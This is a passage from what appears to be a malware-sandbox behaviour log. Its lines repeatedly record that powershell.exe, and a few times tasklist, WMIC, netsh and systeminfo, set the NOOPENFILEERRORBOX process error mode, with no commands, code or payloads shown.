              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
